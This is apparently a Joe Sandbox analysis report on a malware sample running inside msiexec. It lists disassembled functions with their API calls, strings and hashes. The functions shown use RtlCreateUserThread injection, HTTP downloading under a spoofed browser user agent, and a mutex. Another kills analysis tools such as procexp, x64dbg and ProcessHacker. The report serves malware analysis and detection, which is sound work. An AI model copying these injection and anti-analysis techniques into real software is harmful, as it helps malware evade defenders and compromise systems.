                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-721857904
                                                                                                                                                                                                                        • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction ID: 951007d672d3651b68ace71befb7ddbf8e2c993ad6dbee713dd0779f17d06713
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D171C832D0CA8586E7609B55E48476AF7A0FB847A4F504135D6CDC6B98DF7CD888DF40
                                                                                                                                                                                                                        Function 00007FF6345C2160 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF6345C219D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                        • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                        • Opcode ID: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction ID: ec7ae1e400550b1fbac747b8ba9ffd1a9fffd5dd70ed830d3c439fc5443f813a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C971C736D18A8186E7508B55F49872EF7A0FBC4BA5F105035FA8AC3B68CF7CD9449B40
                                                                                                                                                                                                                        Function 00007FF6345C4524 Relevance: 24.2, APIs: 16, Instructions: 155memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$AllocateCloseFileHandleProcessSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1391523307-0
                                                                                                                                                                                                                        • Opcode ID: c083718f08d0c72eded97b33700526ef96675f7b3bff10be0d6bfba5df6ede19
                                                                                                                                                                                                                        • Instruction ID: 1d37d518fce9c0c671d700a36a2192faeebec720128306af63541fc50661fce1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c083718f08d0c72eded97b33700526ef96675f7b3bff10be0d6bfba5df6ede19
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E81B936A08B9186EA50CB55F48476AF7A0FBC9BA6F104135DA8EC3B68DF7CD445DB00
                                                                                                                                                                                                                        Function 00007FF6345C306C Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C4404: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C30A7), ref: 00007FF6345C4494
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3BE4: RegDeleteKeyW.ADVAPI32 ref: 00007FF6345C3BFC
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3DE4: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6345C3DF7
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3DE4: Process32FirstW.KERNEL32 ref: 00007FF6345C3E2A
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3DE4: CloseHandle.KERNEL32 ref: 00007FF6345C3E3C
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3DE4: wcscmp.MSVCRT ref: 00007FF6345C3E51
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3DE4: OpenProcess.KERNEL32 ref: 00007FF6345C3E67
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3DE4: TerminateProcess.KERNEL32 ref: 00007FF6345C3E8A
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3DE4: CloseHandle.KERNEL32 ref: 00007FF6345C3E98
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3DE4: Process32NextW.KERNEL32 ref: 00007FF6345C3EAB
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3DE4: CloseHandle.KERNEL32 ref: 00007FF6345C3EBD
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00007FF6345C3156
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseHandle$ProcessProcess32$CreateDeleteFirstNextOpenSleepSnapshotTerminateToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                        • API String ID: 4011447834-928700279
                                                                                                                                                                                                                        • Opcode ID: 339fd54a0e88a8edec9c2291851a6af2bb4e1354df30f5a312e4e2acca931261
                                                                                                                                                                                                                        • Instruction ID: 2f6e544f7d813623e4dd114ae325faaccdc1623f24440dd1c99868d9fa5c833b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 339fd54a0e88a8edec9c2291851a6af2bb4e1354df30f5a312e4e2acca931261
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3221A920E1D546A0EA00EB24D8D11F9E721AF60375F800132D41DC23F2DE6EEE4DE301
                                                                                                                                                                                                                        Function 00007FF6345C2DFC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID: rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 299056699-189039185
                                                                                                                                                                                                                        • Opcode ID: 38ee3acfd37bcc54bc171a250b67dee5856fd1290622cbb628fe660574ac1ff6
                                                                                                                                                                                                                        • Instruction ID: 90a455078c76dfe13eb5a060bd68254fc1c948adec451d59e531bbe7c3939303
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38ee3acfd37bcc54bc171a250b67dee5856fd1290622cbb628fe660574ac1ff6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B017526E0CA42C1E7209B11EC9423DA760FBD8BBAF441535E98EC2774CF3CD985E640
                                                                                                                                                                                                                        Function 00007FF6345C3884 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6345C3744
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3704: GetVolumeInformationW.KERNEL32 ref: 00007FF6345C37C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF6345C3704: wsprintfW.USER32 ref: 00007FF6345C3862
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C38CD
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C38E2
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C38F5
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C3905
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C392D
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C3940
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6345C3A69), ref: 00007FF6345C3955
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 943468954-4119554291
                                                                                                                                                                                                                        • Opcode ID: 1b61880e004d43661280f0cb070f80f860ebf9c3e77f95e2088ce91db1cafed7
                                                                                                                                                                                                                        • Instruction ID: dcb135a981eaf403d8143dc114d857b6844a5ef488451b1bd7833ac22261e18c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b61880e004d43661280f0cb070f80f860ebf9c3e77f95e2088ce91db1cafed7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2113335E2898685DB60DF25F8A476AA361FBC4B55F406031DA4EC3B29DF3CD908D784
                                                                                                                                                                                                                        Function 00007FF6345C3DE4 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1083639309-0
                                                                                                                                                                                                                        • Opcode ID: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction ID: 3ebe4391cd08728424858948bffff835260f3074f86b4951e283ac16297ffa04
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8221CF31E0CA86C1E7709B11E8C836AE3A1FBD4B65F005234C65DC26A8DF3DD845EB40
                                                                                                                                                                                                                        Function 00007FF6345C2E9C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 299056699-0
                                                                                                                                                                                                                        • Opcode ID: 375159da82b254cffee43355908740546a62a67f3f10456f7c5f5d243881e9da
                                                                                                                                                                                                                        • Instruction ID: d4b22c4b82d73bb1d5b30fb9c8e4ac22bbbf6050fdb273947db342ce2336bcde
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 375159da82b254cffee43355908740546a62a67f3f10456f7c5f5d243881e9da
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99019A26D1CA46C2E7209B21EC9423DA770FBD8B66F401535E98EC6774CF3CD944D640
                                                                                                                                                                                                                        Function 00007FF6345C3CA4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                        • Opcode ID: 70abf51bf9df583d0d42a88b51854933bbba50bd6965b6466e2bf9ea4c99219c
                                                                                                                                                                                                                        • Instruction ID: 499dc928367373acd15941bc3bfa0afc729f88dd90bd380e4b5ccb735ceb6a2b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70abf51bf9df583d0d42a88b51854933bbba50bd6965b6466e2bf9ea4c99219c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A031D676A1CAC595D7709B19E4D83AAB3A1FB98790F000225DA8EC3B68DF3CD954DB00
                                                                                                                                                                                                                        Function 00007FF6345C13C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction ID: 7f76c7b2328b5cd59b6a9a790ef062e636cc5b07ec7bbe68fd715686a889c5a2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0001D662D0865686E6708F51E4C832AA7A0FB84369F905135D68EC67A4DF7CDA49DF00
                                                                                                                                                                                                                        Function 00007FF6345C3FC4 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0
                                                                                                                                                                                                                        • Opcode ID: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction ID: 3b73426cc70003b2fccdc483a1811287ae091c705d4f42d5ec36f8b90dc8f445
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7311FE71E0CA8681E7708B11E8C836AA3A0FB84765F005235D6AEC6798DF3DD904EB00
                                                                                                                                                                                                                        Function 00007FF6345C3704 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                        • API String ID: 3001812590-640692576
                                                                                                                                                                                                                        • Opcode ID: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
                                                                                                                                                                                                                        • Instruction ID: f25616f13cfec169680b56eb4c09484f5cf1bff49f332aac719c57b792230a5c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f59420b8f827cfb11394142374efd971ec66bac13221c6480dae27b971b1b6b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3231F426A1C6C586DB30DB64E4983AAB3A0FB94714F401136E68DC7B98EF7DC949DB00
                                                                                                                                                                                                                        Function 00007FF6345C1088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1541327569.00007FF6345C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6345C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541258611.00007FF6345C0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1541731202.00007FF6345C5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1545662877.00007FF6345C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546732817.00007FF6345C9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1546809852.00007FF6345CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff6345c0000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                        • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
